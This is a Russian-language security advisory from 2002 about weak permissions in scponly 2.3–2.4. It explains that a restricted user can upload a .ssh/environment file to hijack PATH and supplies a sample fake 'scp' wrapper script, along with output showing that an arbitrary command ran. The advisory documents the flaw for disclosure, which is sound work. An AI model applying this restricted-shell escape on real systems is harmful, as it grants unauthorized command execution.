Слабые разрешения в SSH клиенте scponly

Дата публикации:
26.08.2002
Всего просмотров:
879
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Scponly (Sublimation.org) – SSH клиент для UNIX и LINUX систем.

Заданная по умолчанию инсталляция scponly не достаточно ограничивает доступ в подкаталог .ssh. Уязвимость позволяет удаленному пользователю загружать файлы, которые позволяют выполнять произвольные команды. Пример:

$HOME/.ssh/environment: 
# ssh environment 
PATH=/home/myhomedir/:/usr/bin:/bin 
#end 
Subsequently, the user could upload the following file to their home 
directory, and call it scp: 
#!/bin/sh 
echo "I'm a bad boy" > /tmp/exploit 
/usr/bin/scp $@ 
# end 
When they next scp a file: 
[root@restricted /tmp] 
# ls -l 
total 24 
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit 
[root@restricted /tmp] 
# cat exploit 
I'm a bad boy
уязвимость обнаружена в scponly 2.3-2.4

Ссылки: vulnerabilities in scponly
или введите имя

CAPTCHA